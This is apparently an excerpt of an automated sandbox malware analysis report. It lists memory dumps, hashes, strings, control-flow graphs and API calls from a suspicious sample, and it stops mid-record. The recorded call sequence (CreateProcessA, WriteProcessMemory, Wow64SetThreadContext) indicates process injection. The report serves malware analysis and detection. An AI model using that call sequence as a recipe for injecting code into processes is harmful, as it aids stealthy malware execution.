                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                              • Instruction ID: df23dc21eeb217cef10665139a51cf27273a1e9efddfd195031fa44906b3d727
                                                              • Opcode Fuzzy Hash: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                              • Instruction Fuzzy Hash: EC51E8B1A04216BFCB25DB9CCC9097EFBF8BB48241B548169F495DB681D374DE4087E0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                              • Instruction ID: d8db2cc935c04da8549c0d4b0bacd9880ed0dd0ebb3c32833c86eeddd5fda8ee
                                                              • Opcode Fuzzy Hash: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                              • Instruction Fuzzy Hash: 9651F475A00646AFCB24DF9CDCA097EBBF9EF44200B24845EF496D7681E7B4DA4087A0
                                                              Strings
                                                              • Execute=1, xrefs: 01604713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01604725
                                                              • ExecuteOptions, xrefs: 016046A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01604742
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01604787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016046FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01604655
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                              • Instruction ID: 785c176b1b668f34f1b48950a1252c830c4a8a00b4b28a004afc10c9a6e35368
                                                              • Opcode Fuzzy Hash: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                              • Instruction Fuzzy Hash: 9651093160021A7EEF21AFE9EC86BAE77A8FF58700F04009DD605AF591DB709A458F54
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: f176d336896507b81ae247c519764fd48b9e536a4949eb655f99d2d663688700
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 4381AD70E0524A9FEF35CE6CC8917BEBBA3BF46360F1A4659D861AF291C6349840CB51
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 0c4d80920fc8e84668a33cd49b23d2b2398be0338a8c55c993f24f2627ffbc18
                                                              • Instruction ID: ba6e191a6adb3e40efcdd6cb78189a020b2d58862274464fa9570a7dbbb95b2d
                                                              • Opcode Fuzzy Hash: 0c4d80920fc8e84668a33cd49b23d2b2398be0338a8c55c993f24f2627ffbc18
                                                              • Instruction Fuzzy Hash: 2021537AA0011AABDB20DF69DC54AEEBBF8AF54641F54011AFA45E7240E730DA11CBA1
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016002BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016002E7
                                                              • RTL: Re-Waiting, xrefs: 0160031E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                              • Instruction ID: e71c86800a6dc1d2f3a84f317c27e0af50aec4dd5123f9951130d8db1a310815
                                                              • Opcode Fuzzy Hash: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                              • Instruction Fuzzy Hash: 02E19C306047429FD72ACF2CCC84B6ABBE0BB88754F144A6EF5A58B2E1D774D945CB42
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01607B7F
                                                              • RTL: Re-Waiting, xrefs: 01607BAC
                                                              • RTL: Resource at %p, xrefs: 01607B8E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                              • Instruction ID: daba75950b8e8159b8e9784b2cc5b19c78c1d7965538d5fa5f53cc92bbbe1139
                                                              • Opcode Fuzzy Hash: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                              • Instruction Fuzzy Hash: D941D0317007039FD725DE69CC41B6BB7E5FB98B10F000A1DE9AA9B780DB71E8058B91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 016072C1
                                                              • RTL: Resource at %p, xrefs: 016072A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01607294
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                              • Instruction ID: cc1bf0877383e9aedd7ed62e53955c8c1088ce8ed99bbb17fec1d48dc4fa8b73
                                                              • Opcode Fuzzy Hash: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                              • Instruction Fuzzy Hash: 34411231604206AFC725CE69CC82F6AB7A6FF94B10F14461CF9959B280DB31F8128BD1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: fef0f8433d28696708cc1860b8757b9e73884b7814e6151eaba94fadf4a304a1
                                                              • Instruction ID: 7aff1f3a2368420c9fd9a85c4d5df41e00ea5e703a450f397541e2745708c1c3
                                                              • Opcode Fuzzy Hash: fef0f8433d28696708cc1860b8757b9e73884b7814e6151eaba94fadf4a304a1
                                                              • Instruction Fuzzy Hash: E2318072A006199FDB21DF2DDC50BEEB7F8FB44610F54059AF949E7240EB30AA548FA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: bd109ff267c79021aff9273fbea2723ddd8661a325ea45c090fcd2d617567fbd
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: D791A171E002179EEB34DF6DC8816BEBBA1FF88328F54455AE965EF2C0E73099418751
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                              • Instruction ID: ef814f6d351ff82fd828096481570fb976f1265b752c47719c6ffab4973dd735
                                                              • Opcode Fuzzy Hash: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                              • Instruction Fuzzy Hash: CE810CB1D0026A9BDB35CB54CC44BEEB7B4BF48714F0041DAAA19BB680D7309E84CFA1

                                                              Execution Graph

                                                              Execution Coverage:10.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:334
                                                              Total number of Limit Nodes:24
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1530340710.000000000BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_bfb0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 515cd28a793fc317d72faa515dfc5cdf20a5ad28af9f05608ea508622091bfeb
                                                              • Instruction ID: 622a0eefde46cbca938c5977588bb18a94a06ee0ffa1815f0113c1d35c6d0711
                                                              • Opcode Fuzzy Hash: 515cd28a793fc317d72faa515dfc5cdf20a5ad28af9f05608ea508622091bfeb
                                                              • Instruction Fuzzy Hash: 4BA00273D6D006D6CA450F1F8021CF7F73DA65B944E207750812AB7D138726C1615D1C

                                                              Control-flow Graph (rendered graph with executed / not-executed block highlighting omitted; edge list follows)
                                                              control_flow_graph 342 157d5b9-157d657 GetCurrentProcess 346 157d660-157d694 GetCurrentThread 342->346 347 157d659-157d65f 342->347 348 157d696-157d69c 346->348 349 157d69d-157d6d1 GetCurrentProcess 346->349 347->346 348->349 350 157d6d3-157d6d9 349->350 351 157d6da-157d6f5 call 157d797 349->351 350->351 355 157d6fb-157d72a GetCurrentThreadId 351->355 356 157d733-157d795 355->356 357 157d72c-157d732 355->357 357->356
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D646
                                                              • GetCurrentThread.KERNEL32 ref: 0157D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0157D719
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 277f018b8879f01bb2d543521674674f4b57321a318fcf94d0348e2c638acd31
                                                              • Instruction ID: 4a8d46bdf633798dd13374541ffbdea06fa289cb4bea377388c260234aeef254
                                                              • Opcode Fuzzy Hash: 277f018b8879f01bb2d543521674674f4b57321a318fcf94d0348e2c638acd31
                                                              • Instruction Fuzzy Hash: DE5188B0D013498FEB14DFAAE54979EBBF1FF48304F208459D419AB290D7346945CF25

                                                              Control-flow Graph (rendered graph with executed / not-executed block highlighting omitted; edge list follows)
                                                              control_flow_graph 364 157d5c8-157d657 GetCurrentProcess 368 157d660-157d694 GetCurrentThread 364->368 369 157d659-157d65f 364->369 370 157d696-157d69c 368->370 371 157d69d-157d6d1 GetCurrentProcess 368->371 369->368 370->371 372 157d6d3-157d6d9 371->372 373 157d6da-157d6f5 call 157d797 371->373 372->373 377 157d6fb-157d72a GetCurrentThreadId 373->377 378 157d733-157d795 377->378 379 157d72c-157d732 377->379 379->378
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D646
                                                              • GetCurrentThread.KERNEL32 ref: 0157D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0157D719
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: dc7af2536cd0902dec7013e8186fc88bb12eea892cf7f0e1e85293188ea85a68
                                                              • Instruction ID: e5c78d090ea9a2ef1dbaa2b56c0bb6fcc320efaffcb0547d35f27a6cb69d3fbb
                                                              • Opcode Fuzzy Hash: dc7af2536cd0902dec7013e8186fc88bb12eea892cf7f0e1e85293188ea85a68
                                                              • Instruction Fuzzy Hash: 105187B09013098FEB14DFAAE549B9EBBF1FF88310F208459D419AB390D7346944CF65

                                                              Control-flow Graph (rendered graph with executed / not-executed block highlighting omitted; edge list follows)
                                                              control_flow_graph 796 73ae07c-73ae11d 798 73ae11f-73ae129 796->798 799 73ae156-73ae176 796->799 798->799 800 73ae12b-73ae12d 798->800 804 73ae178-73ae182 799->804 805 73ae1af-73ae1de 799->805 802 73ae12f-73ae139 800->802 803 73ae150-73ae153 800->803 806 73ae13b 802->806 807 73ae13d-73ae14c 802->807 803->799 804->805 808 73ae184-73ae186 804->808 815 73ae1e0-73ae1ea 805->815 816 73ae217-73ae2d1 CreateProcessA 805->816 806->807 807->807 809 73ae14e 807->809 810 73ae188-73ae192 808->810 811 73ae1a9-73ae1ac 808->811 809->803 813 73ae196-73ae1a5 810->813 814 73ae194 810->814 811->805 813->813 817 73ae1a7 813->817 814->813 815->816 818 73ae1ec-73ae1ee 815->818 827 73ae2da-73ae360 816->827 828 73ae2d3-73ae2d9 816->828 817->811 820 73ae1f0-73ae1fa 818->820 821 73ae211-73ae214 818->821 822 73ae1fe-73ae20d 820->822 823 73ae1fc 820->823 821->816 822->822 824 73ae20f 822->824 823->822 824->821 838 73ae362-73ae366 827->838 839 73ae370-73ae374 827->839 828->827 838->839 840 73ae368 838->840 841 73ae376-73ae37a 839->841 842 73ae384-73ae388 839->842 840->839 841->842 843 73ae37c 841->843 844 73ae38a-73ae38e 842->844 845 73ae398-73ae39c 842->845 843->842 844->845 846 73ae390 844->846 847 73ae3ae-73ae3b5 845->847 848 73ae39e-73ae3a4 845->848 846->845 849 73ae3cc 847->849 850 73ae3b7-73ae3c6 847->850 848->847 852 73ae3cd 849->852 850->849 852->852
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073AE2BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: db02b9488bf6082024e8fbe367890ac3c206dac843130e8372b1e333ca666f75
                                                              • Instruction ID: dcd924f4d4ca1ab939575aeb3508f54e929a9f378a9c98ddb4e0bd4e97a5fa12
                                                              • Opcode Fuzzy Hash: db02b9488bf6082024e8fbe367890ac3c206dac843130e8372b1e333ca666f75
                                                              • Instruction Fuzzy Hash: EBA14EB1D0032ADFEB24DF68C842B9DBBB2FF48310F1485A9D819A7240D7759985CF91

                                                              Control-flow Graph (rendered graph with executed / not-executed block highlighting omitted; edge list follows)
                                                              control_flow_graph 853 73ae088-73ae11d 855 73ae11f-73ae129 853->855 856 73ae156-73ae176 853->856 855->856 857 73ae12b-73ae12d 855->857 861 73ae178-73ae182 856->861 862 73ae1af-73ae1de 856->862 859 73ae12f-73ae139 857->859 860 73ae150-73ae153 857->860 863 73ae13b 859->863 864 73ae13d-73ae14c 859->864 860->856 861->862 865 73ae184-73ae186 861->865 872 73ae1e0-73ae1ea 862->872 873 73ae217-73ae2d1 CreateProcessA 862->873 863->864 864->864 866 73ae14e 864->866 867 73ae188-73ae192 865->867 868 73ae1a9-73ae1ac 865->868 866->860 870 73ae196-73ae1a5 867->870 871 73ae194 867->871 868->862 870->870 874 73ae1a7 870->874 871->870 872->873 875 73ae1ec-73ae1ee 872->875 884 73ae2da-73ae360 873->884 885 73ae2d3-73ae2d9 873->885 874->868 877 73ae1f0-73ae1fa 875->877 878 73ae211-73ae214 875->878 879 73ae1fe-73ae20d 877->879 880 73ae1fc 877->880 878->873 879->879 881 73ae20f 879->881 880->879 881->878 895 73ae362-73ae366 884->895 896 73ae370-73ae374 884->896 885->884 895->896 897 73ae368 895->897 898 73ae376-73ae37a 896->898 899 73ae384-73ae388 896->899 897->896 898->899 900 73ae37c 898->900 901 73ae38a-73ae38e 899->901 902 73ae398-73ae39c 899->902 900->899 901->902 903 73ae390 901->903 904 73ae3ae-73ae3b5 902->904 905 73ae39e-73ae3a4 902->905 903->902 906 73ae3cc 904->906 907 73ae3b7-73ae3c6 904->907 905->904 909 73ae3cd 906->909 907->906 909->909
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073AE2BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: b21562ffb52f2a8e8bc527eac5f1263da22015304a7ad0f71c16560e5210728a
                                                              • Instruction ID: 730ce1901af384c3db94408efa91f0d8de77e2e9c13e59720fa54373795bc6fd
                                                              • Opcode Fuzzy Hash: b21562ffb52f2a8e8bc527eac5f1263da22015304a7ad0f71c16560e5210728a
                                                              • Instruction Fuzzy Hash: 13915EB1D0032ADFEB24DF69C8427ADBBB2FF48310F1485A9D819A7240DB759985CF91
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0157B17E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 5011c871b76e29649283c1407e6999ff8a24cbbf2d21396df448d4d66cc2fca3
                                                              • Instruction ID: 06195763a33991da3548c41b8efaee0f7cc8ee4017bd1ef30c42617d3475a823
                                                              • Opcode Fuzzy Hash: 5011c871b76e29649283c1407e6999ff8a24cbbf2d21396df448d4d66cc2fca3
                                                              • Instruction Fuzzy Hash: 02817870A00B058FE725CF2AE45579ABBF1FF88304F04892ED09ADBA50D735E849CB91
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015759C9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: af29024bb383292ce7a765d64673177939b7b7d779ce8f07210a3cb67a46a106
                                                              • Instruction ID: 3869455e2141592f0e6a9c9820e530a93628dc269b570de7b569bcf57ca21e22
                                                              • Opcode Fuzzy Hash: af29024bb383292ce7a765d64673177939b7b7d779ce8f07210a3cb67a46a106
                                                              • Instruction Fuzzy Hash: DB41DF71C0172DCBEB24DFAAC885B8DBBF5BF49314F20816AD408AB251DB756946CF90
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015759C9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 4b3f82fc0b51ad6ed989c87f96fdb90b7a14ec220710168eade55fae59359045
                                                              • Instruction ID: 9e6965ef40d27c8a535e67a337a90b58bca2ed85401d749046f446309f8f6b18
                                                              • Opcode Fuzzy Hash: 4b3f82fc0b51ad6ed989c87f96fdb90b7a14ec220710168eade55fae59359045
                                                              • Instruction Fuzzy Hash: B441F271C0072DCBEB24DFA9C885B8DBBF5BF49304F20816AD408AB251DBB56946CF90
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073ADA90
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 625fca3aede0fe32518a32afb4e7b5860c6800a2bff1fe2e43d2caf350666630
                                                              • Instruction ID: 495814117909ca27111b43e1dcf944f00c68a5f4dba45f79b623911040f1c50d
                                                              • Opcode Fuzzy Hash: 625fca3aede0fe32518a32afb4e7b5860c6800a2bff1fe2e43d2caf350666630
                                                              • Instruction Fuzzy Hash: 442148B5D003499FDB10DFA9D845BDEBBF5FF48310F50882AE959A7240D7799940CBA0
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07385D3D,?,?), ref: 07385DEF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528172425.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7380000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 21617b5b0611df690975c1654b309ca76c63263ec6f105f40b8b876100ec366f
                                                              • Instruction ID: 671e916b8ce1a672573dfbf6ac43b5c4a89afcf59a54e6958abbea1e206f0994
                                                              • Opcode Fuzzy Hash: 21617b5b0611df690975c1654b309ca76c63263ec6f105f40b8b876100ec366f
                                                              • Instruction Fuzzy Hash: 5731C5B5D003499FDB10DF9AD884A9EFBF5FB48310F14842AE919A7310D775A954CFA0
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07385D3D,?,?), ref: 07385DEF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528172425.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7380000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 9690d69aa288c0d3312c5e327f5743cebd80f8b4e24c67d91cd6e0d073fe9936
                                                              • Instruction ID: f98ed29b62596befafbd1fc41559591371ed012cc9121eee89cc00620adbd75a
                                                              • Opcode Fuzzy Hash: 9690d69aa288c0d3312c5e327f5743cebd80f8b4e24c67d91cd6e0d073fe9936
                                                              • Instruction Fuzzy Hash: CC31E2B6D0030A9FDB10DF99D884ADEBBF5BB48320F14842AE819A7210D774A954CFA0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0157D897
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 28dc71ef66cfbd88e4a416834939f54da1f2b60bf117c388030fa9c23c4ccedf
                                                              • Instruction ID: 69d72dbcdb0f4305e75bf07b5c4204f08c1ce9bc4d1fbc81c9f1eb2c772deb14
                                                              • Opcode Fuzzy Hash: 28dc71ef66cfbd88e4a416834939f54da1f2b60bf117c388030fa9c23c4ccedf
                                                              • Instruction Fuzzy Hash: D53125B5C002499FDB10CFAAD885ADEBFF4EF49320F14851AE958A7250D378A941CF61
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073ADA90
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 044d6db88e361660736c44a9ab0c27d5acd3c417f74b42986b9a5f84a0fc5fe0
                                                              • Instruction ID: 80ed0b0bc06f7f38658a7178e7f6365b27c3cb6cbf784ce2452df7a03dc7c65c
                                                              • Opcode Fuzzy Hash: 044d6db88e361660736c44a9ab0c27d5acd3c417f74b42986b9a5f84a0fc5fe0
                                                              • Instruction Fuzzy Hash: 352126B5D003499FDB10DFAAC881BDEBBF5FF48310F50842AE959A7240D7799940CBA4
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073AD4AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: af63903d9ee386e0cbc0179a9a81ab6af718f825093606fd3b1fadbdb672e454
